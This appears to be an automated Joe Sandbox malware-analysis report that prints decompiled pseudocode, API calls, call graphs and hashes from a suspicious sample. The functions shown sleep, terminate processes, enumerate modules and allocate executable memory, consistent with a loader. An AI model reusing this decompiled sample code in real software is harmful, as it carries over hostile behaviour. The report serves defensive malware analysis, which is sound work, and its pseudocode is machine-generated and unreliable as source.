                				_t26 = _t36 - 0x50;
                				E004059F9(_t26, _t36 - 0x28);
                				E00406A7D(_t36 - 0x50, 0x417f4c);
                				asm("int3");
                				E00406EB0(E00415D80, _t36);
                				_push(_t26);
                				_push(__edi);
                				_t30 =  *((intOrPtr*)(_t36 + 8));
                				_t34 = _t26;
                				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                				E004064D7(_t26, _t30);
                				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                				_t31 = _t30 + 0xc;
                				 *_t34 = 0x401460;
                				E00405879(_t34 + 0xc, _t30 + 0xc, _t31);
                				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                				return _t34;
                			}







                0x00405a6b
                0x00405a7b
                0x00405a80
                0x00405a88
                0x00405a8b
                0x00405a99
                0x00405a9e
                0x00405aa4
                0x00405aa9
                0x00405aab
                0x00405aac
                0x00405aaf
                0x00405ab2
                0x00405ab5
                0x00405aba
                0x00405abe
                0x00405ac5
                0x00405acb
                0x00405ad7
                0x00405adf

                APIs
                • __EH_prolog.LIBCMT ref: 00405A6B
                • __CxxThrowException@8.LIBCMT ref: 00405A99
                  • Part of subcall function 00406A7D: RaiseException.KERNEL32(?,?,|j@,?,?,?,?,?,00406A7C,?,h@~A,00557578,?,00405205,?), ref: 00406ABF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ExceptionException@8H_prologRaiseThrow
                • String ID: vector<T> too long
                • API String ID: 1681477883-3788999226
                • Opcode ID: 8c3031ba3a6622350d04cb4ce8e5b1b27fb0d801667b1a19860317c8fe9f82a1
                • Instruction ID: 541874f6c559136a1169ae94454034f240169b8584b29a69a84ea93e7979944c
                • Opcode Fuzzy Hash: 8c3031ba3a6622350d04cb4ce8e5b1b27fb0d801667b1a19860317c8fe9f82a1
                • Instruction Fuzzy Hash: 17D0ECB290020896C704F6E1CC46ADF7378AF14318F14513AB002B10D1DB7C9648CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:6.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:63.2%
                Total number of Nodes:19
                Total number of Limit Nodes:0
                execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                Control-flow Graph

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}














                0x0040180c
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_file.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_file.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}







                0x00401822
                0x00401822
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_file.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401826
                0x00401826
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_file.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401834
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.318347734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_file.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:9.4%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:37.5%
                Total number of Nodes:16
                Total number of Limit Nodes:1
                execution_graph 362 8cb921 363 8cb932 362->363 364 8cc0d2 3 API calls 363->364 365 8cb94a 364->365 347 8cb932 348 8cb941 347->348 351 8cc0d2 348->351 352 8cc0ed 351->352 353 8cc0f6 CreateToolhelp32Snapshot 352->353 354 8cc112 Module32First 352->354 353->352 353->354 355 8cb94a 354->355 356 8cc121 354->356 358 8cbd91 356->358 359 8cbdbc 358->359 360 8cbdcd VirtualAlloc 359->360 361 8cbe05 359->361 360->361 361->361

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_008CCF8D 1 Function_008D198E 2 Function_008D1A88 3 Function_008CCF84 4 Function_008CDC84 5 Function_008CC585 6 Function_008CCF82 7 Function_008CC083 8 Function_008CDF9D 9 Function_008CDE9E 10 Function_008CCF9F 11 Function_008CC19A 12 Function_008CDE97 13 Function_008CE491 14 Function_008CBD91 20 Function_008CC0A4 14->20 57 Function_008CBE1E 14->57 15 Function_008CCFAD 16 Function_008D1EAF 17 Function_008CB9AF 68 Function_008CBA30 17->68 18 Function_008CCAA8 19 Function_008D1CAB 21 Function_008D19A3 22 Function_008CD7A3 23 Function_008CC4BB 24 Function_008CCEB5 25 Function_008CE4B5 26 Function_008D1CB1 27 Function_008D19B3 28 Function_008CC0CC 28->7 29 Function_008CD8CD 30 Function_008CDAC6 31 Function_008CCEC0 32 Function_008CC6C2 33 Function_008CDADC 34 Function_008CD3DD 35 Function_008CD7D9 36 Function_008D19D4 37 Function_008CCFD0 38 Function_008CC1D1 39 Function_008CC0D2 39->14 40 Function_008CCFE5 41 Function_008CE2FE 42 Function_008D1DFF 43 Function_008CE3F3 44 Function_008CCA0F 45 Function_008CE208 46 Function_008CD105 47 Function_008D1A04 48 Function_008D1D06 49 Function_008CE300 50 Function_008D8901 51 Function_008CCB01 52 Function_008CD301 53 Function_008CDF02 54 Function_008CCA03 55 Function_008CBE1C 56 Function_008CD71C 58 Function_008D2011 59 Function_008CC82B 60 Function_008CD325 61 Function_008D2024 62 Function_008D1E27 63 Function_008CB921 63->39 73 Function_008CB94E 63->73 64 Function_008CD03F 65 Function_008D183B 66 Function_008CD434 67 Function_008CCB36 69 Function_008CC131 70 Function_008CB932 70->39 70->73 71 Function_008D1832 72 Function_008CE34C 85 Function_008CB966 73->85 74 Function_008D1A4B 75 Function_008D1D44 76 Function_008CE447 77 Function_008CDB42 78 Function_008CDF42 79 Function_008D185B 80 Function_008CD457 81 Function_008CD450 82 Function_008CD06D 83 Function_008CD06A 84 Function_008D1C6A 85->17 86 Function_008CD667 87 Function_008CCE61 88 Function_008D1A62 89 Function_008CDA78 90 Function_008D1E78 91 Function_008CC57B 92 Function_008CE376 93 Function_008CE570 94 Function_008D1E71 95 Function_008CC473 96 Function_008D1F72

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 8cc0d2-8cc0eb 1 8cc0ed-8cc0ef 0->1 2 8cc0f6-8cc102 CreateToolhelp32Snapshot 1->2 3 8cc0f1 1->3 4 8cc104-8cc10a 2->4 5 8cc112-8cc11f Module32First 2->5 3->2 4->5 12 8cc10c-8cc110 4->12 6 8cc128-8cc130 5->6 7 8cc121-8cc122 call 8cbd91 5->7 10 8cc127 7->10 10->6 12->1 12->5
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008CC0FA
                • Module32First.KERNEL32(00000000,00000224), ref: 008CC11A
                Memory Dump Source
                • Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: c5d918953e82edebfdbd6a4634032c710f9a29f727dc587f0c8e00dab3eabb4c
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 0EF0CD32600710ABE7202AF9A88DF6A72FCFF48360F14012DE68AD10C0DB74E8458A61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 13 8cbd91-8cbdcb call 8cc0a4 16 8cbdcd-8cbe00 VirtualAlloc call 8cbe1e 13->16 17 8cbe19 13->17 19 8cbe05-8cbe17 16->19 17->17 19->17
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008CBDE2
                Memory Dump Source
                • Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: 0badc40e573ae91801e478e96a3c808ec1b7498ae0268a33fea79e2f83a2bd24
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E99BBF5EF08750F158094FA489B362D371EA50DF80
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 122 8cb9af-8cb9c1 123 8cb9c4-8cb9d7 call 8cba30 122->123 126 8cb9dd-8cb9fa 123->126 127 8cb9d9-8cb9db 123->127 128 8cb9fc-8cba0f call 8cba30 126->128 127->123 131 8cba19-8cba2d 128->131 132 8cba11-8cba17 128->132 132->128
                Memory Dump Source
                • Source File: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C6000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_8c6000_vhefigi.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: b563d361f9ffd9e8f56163311aac4d2fc26e4ca69a7474ae4d743e0675f237f7
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 66117C72340504AFDB54DE59DC82FA677EAFB88320B298069EA04CB312E775EC02C760
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:6.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:19
                Total number of Limit Nodes:0
                execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                Control-flow Graph

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}














                0x0040180c
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 0000000C.00000002.398678402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_vhefigi.jbxd
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
